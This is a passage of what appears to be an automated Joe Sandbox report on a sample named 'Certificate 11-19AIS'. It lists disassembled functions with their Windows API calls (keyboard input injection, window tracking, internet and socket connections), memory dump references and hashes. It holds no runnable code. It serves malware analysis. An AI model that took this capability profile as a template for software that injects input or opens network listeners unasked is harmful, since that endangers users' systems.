                                                                              • Opcode ID: 3833f95358e3e9d8f3b4a64b0f77430bb28caa0fa6bc6ba1b22fa84c8162feaf
                                                                              • Instruction ID: e486fa985e7208a95bbaa438f7513e0e06871360a614e48dd50b8abefcf77584
                                                                              • Opcode Fuzzy Hash: 3833f95358e3e9d8f3b4a64b0f77430bb28caa0fa6bc6ba1b22fa84c8162feaf
                                                                              • Instruction Fuzzy Hash: 95D0C7745007529FD7205F65F80864BFAF8FF55715B119819E456F2250D6B4D4C08F90
                                                                              Function 007E9B30 Relevance: 6.3, APIs: 4, Instructions: 306COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f8f6f5d89076fb9398dbf4fbf5bf601f04e684f52ebf70068bdf2cb5278214c0
                                                                              • Instruction ID: 6c92323fb19a491bd61289bc1ad5680799aa7e0cd8fb2de98e177312afbf40d4
                                                                              • Opcode Fuzzy Hash: f8f6f5d89076fb9398dbf4fbf5bf601f04e684f52ebf70068bdf2cb5278214c0
                                                                              • Instruction Fuzzy Hash: 94C1A172A01259EFCB14DFA5C884EAEB7B4FF48700F104598EA05EB251D734EE41DBA0
                                                                              Function 0080AA84 Relevance: 6.3, APIs: 4, Instructions: 268COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CoInitialize.OLE32(00000000), ref: 0080AAB4
                                                                              • CoUninitialize.OLE32 ref: 0080AABF
                                                                                • Part of subcall function 007F0213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 007F027B
                                                                              • VariantInit.OLEAUT32(?), ref: 0080AACA
                                                                              • VariantClear.OLEAUT32(?), ref: 0080AD9D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                              • String ID:
                                                                              • API String ID: 780911581-0
                                                                              • Opcode ID: e54fa2b9ffa56d1337d54b0f7c974cc66faeeed06ce399efa681a6261da00c9e
                                                                              • Instruction ID: 324939fb4bd9af22c5fcb9f455f13cc72b0298132ae3626b9a7179ccb059abe6
                                                                              • Opcode Fuzzy Hash: e54fa2b9ffa56d1337d54b0f7c974cc66faeeed06ce399efa681a6261da00c9e
                                                                              • Instruction Fuzzy Hash: F4A134352047019FDB54EF14C895B6AB7E5FF89720F158849FA969B3A2CB34ED00CB86
                                                                              Function 007E91CC Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$AllocClearCopyInitString
                                                                              • String ID:
                                                                              • API String ID: 2808897238-0
                                                                              • Opcode ID: 08f21d8a0f61ae2fe7d91b5c1507f09e44d372997e381b66339b2cb6b3df716c
                                                                              • Instruction ID: 8fa1abeb5baf5d5cfd4ff2aee95e9822b077bf453161c3b0b18a8a0560fa0002
                                                                              • Opcode Fuzzy Hash: 08f21d8a0f61ae2fe7d91b5c1507f09e44d372997e381b66339b2cb6b3df716c
                                                                              • Instruction Fuzzy Hash: 7E519232601386EBDB249F67D495B6EB3E5AF4D310F20881FE756CB2D1EB7898408705
                                                                              Function 007D365B Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                              • String ID:
                                                                              • API String ID: 3877424927-0
                                                                              • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                              • Instruction ID: f08e3506fee7f4878a3382b836ace49c4e830b6900ef7e97cbf7cd1b9b7ecd16
                                                                              • Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                              • Instruction Fuzzy Hash: 5051A1B0A00605EBDB249FA9888566E7BB5AF40330F24872BF835963D0D779DF50DB52
                                                                              Function 0081C4D7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetWindowRect.USER32(00D066D8,?), ref: 0081C544
                                                                              • ScreenToClient.USER32(?,00000002), ref: 0081C574
                                                                              • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0081C5DA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ClientMoveRectScreen
                                                                              • String ID:
                                                                              • API String ID: 3880355969-0
                                                                              • Opcode ID: 54513ef5dc11e73c22dd0484e247184cdaa7e7105d2aa8cf99e0c11767a47b23
                                                                              • Instruction ID: 0036ccf572d5d192cb9a4cb3b8ac53204bcbec010f25154f48d9031956db8cd6
                                                                              • Opcode Fuzzy Hash: 54513ef5dc11e73c22dd0484e247184cdaa7e7105d2aa8cf99e0c11767a47b23
                                                                              • Instruction Fuzzy Hash: 98511B75900204AFCF10DF68D885AEE77AAFF65720F108659F969DB291D730E981CB90
                                                                              Function 007EC410 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 007EC462
                                                                              • __itow.LIBCMT ref: 007EC49C
                                                                                • Part of subcall function 007EC6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 007EC753
                                                                              • SendMessageW.USER32(?,0000110A,00000001,?), ref: 007EC505
                                                                              • __itow.LIBCMT ref: 007EC55A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$__itow
                                                                              • String ID:
                                                                              • API String ID: 3379773720-0
                                                                              • Opcode ID: b45460fc54ff5e456c8632775ed76c7a432036256bdee54eb738498a15e64829
                                                                              • Instruction ID: b21b84a051b72fd894be590c48b917114cf43ce00014b44c5d95044d73ab7098
                                                                              • Opcode Fuzzy Hash: b45460fc54ff5e456c8632775ed76c7a432036256bdee54eb738498a15e64829
                                                                              • Instruction Fuzzy Hash: E241F975600748EFDF12EF54C85ABEE7BB5AF49700F000059F905A7281DB789A56CB91
                                                                              Function 007F390C Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 007F3966
                                                                              • SetKeyboardState.USER32(00000080,?,00000001), ref: 007F3982
                                                                              • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 007F39EF
                                                                              • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 007F3A4D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: KeyboardState$InputMessagePostSend
                                                                              • String ID:
                                                                              • API String ID: 432972143-0
                                                                              • Opcode ID: ea96fe7536fde94b6705c9228ed511ded6f8da53c739fb0af3d8f1a7610c492b
                                                                              • Instruction ID: 499cf6e5bf8cd460d09dd8e488ece85c8210b0f88656a1e8f2001b36c170bab2
                                                                              • Opcode Fuzzy Hash: ea96fe7536fde94b6705c9228ed511ded6f8da53c739fb0af3d8f1a7610c492b
                                                                              • Instruction Fuzzy Hash: 52412570A0424CAAEF20CB65880ABFDBBB9AB55324F04415AF6C1963C1C7FC9E85D761
                                                                              Function 0081B544 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0081B5D1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: InvalidateRect
                                                                              • String ID:
                                                                              • API String ID: 634782764-0
                                                                              • Opcode ID: 1e9a6287057e8943a38f8bb333cbdb5e4f3fe3a3e326ae4f4e78db609aa2462b
                                                                              • Instruction ID: 722a1fa871499eebda8bb5ef57d8b18b748eaaa05bbc1da62eae14ccfa6b6662
                                                                              • Opcode Fuzzy Hash: 1e9a6287057e8943a38f8bb333cbdb5e4f3fe3a3e326ae4f4e78db609aa2462b
                                                                              • Instruction Fuzzy Hash: 1B31BA74601208AFEF209F58CC89FE8376EFF65354F644515FA12D62E1D730E9C08A91
                                                                              Function 0081D7DE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ClientToScreen.USER32(?,?), ref: 0081D807
                                                                              • GetWindowRect.USER32(?,?), ref: 0081D87D
                                                                              • PtInRect.USER32(?,?,0081ED5A), ref: 0081D88D
                                                                              • MessageBeep.USER32(00000000), ref: 0081D8FE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Rect$BeepClientMessageScreenWindow
                                                                              • String ID:
                                                                              • API String ID: 1352109105-0
                                                                              • Opcode ID: 39ee8190699bdd0dd083f8c73ad9988e07e71c58cde1cca3da997bdaf6c3776f
                                                                              • Instruction ID: 803a68e585decc6309124ad5e89dffd2908af8a6453b5e28819505db0336cdd4
                                                                              • Opcode Fuzzy Hash: 39ee8190699bdd0dd083f8c73ad9988e07e71c58cde1cca3da997bdaf6c3776f
                                                                              • Instruction Fuzzy Hash: 95414570A00219DFCF11DF58D888BA97BB9FF58315F1889A9E818DB264D730E981CB40
                                                                              Function 007F3A61 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetKeyboardState.USER32(?,7608C0D0,?,00008000), ref: 007F3AB8
                                                                              • SetKeyboardState.USER32(00000080,?,00008000), ref: 007F3AD4
                                                                              • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 007F3B34
                                                                              • SendInput.USER32(00000001,?,0000001C,7608C0D0,?,00008000), ref: 007F3B92
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: KeyboardState$InputMessagePostSend
                                                                              • String ID:
                                                                              • API String ID: 432972143-0
                                                                              • Opcode ID: 5a1468dc5bb990f659d9ef36298a08ccf43a401227987750222a4e3f703e7657
                                                                              • Instruction ID: c4c216d056ef4a9f4b420b7c1b8badd9872fb7c62dbccc4c4b7b88a8053c9903
                                                                              • Opcode Fuzzy Hash: 5a1468dc5bb990f659d9ef36298a08ccf43a401227987750222a4e3f703e7657
                                                                              • Instruction Fuzzy Hash: F03124B1A0035CEEEF218B64882DBFE7BA9AB55310F04015AE681973D2C77C8F45D761
                                                                              Function 007E4004 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 007E4038
                                                                              • __isleadbyte_l.LIBCMT ref: 007E4066
                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 007E4094
                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 007E40CA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                              • String ID:
                                                                              • API String ID: 3058430110-0
                                                                              • Opcode ID: cc98e91f5243145c05407a1455344b75c9e0a146a43df400c32564bbe58e34a2
                                                                              • Instruction ID: eb26d05fbd5f64670e0fb84611d1f9d12d19139a4e05dc3fe1cb0d118375241e
                                                                              • Opcode Fuzzy Hash: cc98e91f5243145c05407a1455344b75c9e0a146a43df400c32564bbe58e34a2
                                                                              • Instruction Fuzzy Hash: 6131E431601286EFDF219F36C844B7A7BB5FF48310F1544B9E6658B191E739D890D790
                                                                              Function 00817CA5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetForegroundWindow.USER32 ref: 00817CB9
                                                                                • Part of subcall function 007F5F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 007F5F6F
                                                                                • Part of subcall function 007F5F55: GetCurrentThreadId.KERNEL32 ref: 007F5F76
                                                                                • Part of subcall function 007F5F55: AttachThreadInput.USER32(00000000,?,007F781F), ref: 007F5F7D
                                                                              • GetCaretPos.USER32(?), ref: 00817CCA
                                                                              • ClientToScreen.USER32(00000000,?), ref: 00817D03
                                                                              • GetForegroundWindow.USER32 ref: 00817D09
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                              • String ID:
                                                                              • API String ID: 2759813231-0
                                                                              • Opcode ID: 10f9c4033e3febf87ddc939d4360848cb1171c652daa72261ea4c49ff30d090c
                                                                              • Instruction ID: ebb4062f468388f64fd2a67885ba884a97615b3f9f728fb543168b2998eb56fc
                                                                              • Opcode Fuzzy Hash: 10f9c4033e3febf87ddc939d4360848cb1171c652daa72261ea4c49ff30d090c
                                                                              • Instruction Fuzzy Hash: 6A312F72900108AFDB10EFA9DC45DEFFBFDEF98314B10846AE915E7211DA359E458BA0
                                                                              Function 0081F1D7 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 007CB34E: GetWindowLongW.USER32(?,000000EB), ref: 007CB35F
                                                                              • GetCursorPos.USER32(?), ref: 0081F211
                                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0082E4C0,?,?,?,?,?), ref: 0081F226
                                                                              • GetCursorPos.USER32(?), ref: 0081F270
                                                                              • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0082E4C0,?,?,?), ref: 0081F2A6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                              • String ID:
                                                                              • API String ID: 2864067406-0
                                                                              • Opcode ID: 65be7a52a91685db726fdce3ee0ca7504d8a68bed93de77f6314ffedfcae1578
                                                                              • Instruction ID: b398eb099a14916f41270e059c602051b1afb625e1461c3c5133aa4d6528eaa6
                                                                              • Opcode Fuzzy Hash: 65be7a52a91685db726fdce3ee0ca7504d8a68bed93de77f6314ffedfcae1578
                                                                              • Instruction Fuzzy Hash: C221B179500128EFCF258F98D859EEE7BB9FF4A710F048069FA09872A2D3349D90DB50
                                                                              Function 0080431C Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00804358
                                                                                • Part of subcall function 008043E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00804401
                                                                                • Part of subcall function 008043E2: InternetCloseHandle.WININET(00000000), ref: 0080449E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Internet$CloseConnectHandleOpen
                                                                              • String ID:
                                                                              • API String ID: 1463438336-0
                                                                              • Opcode ID: 72fb104114ef2aaaf44d2e4c67769abbdbb372910baa00556c60d2ad3518108e
                                                                              • Instruction ID: 83fb71c56a3357d054dd03de947a576f0450d3bc2ca7980237bca855553a3119
                                                                              • Opcode Fuzzy Hash: 72fb104114ef2aaaf44d2e4c67769abbdbb372910baa00556c60d2ad3518108e
                                                                              • Instruction Fuzzy Hash: D221D1B5240B05BBEB519F60EC01FBBB7A9FF84714F11601AFB15D6690DB7198209BA0
                                                                              Function 00818A37 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 00818AA6
                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00818AC0
                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00818ACE
                                                                              • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00818ADC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Long$AttributesLayered
                                                                              • String ID:
                                                                              • API String ID: 2169480361-0
                                                                              • Opcode ID: ee8c93196a66edd984697de00e17042e1d91011ee72c253816a7cc2378522873
                                                                              • Instruction ID: e878332bec73ae5a8fe91034be9453e64e86dd56ac0aca4f2b8016b5c45ecf6e
                                                                              • Opcode Fuzzy Hash: ee8c93196a66edd984697de00e17042e1d91011ee72c253816a7cc2378522873
                                                                              • Instruction Fuzzy Hash: 12116A31205125AFD714AB28DC0AFAA779DFF85320F14451AF916C72A2DB64AC418795
                                                                              Function 00808A7F Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00808AE0
                                                                              • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00808AF2
                                                                              • accept.WSOCK32(00000000,00000000,00000000), ref: 00808AFF
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00808B16
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
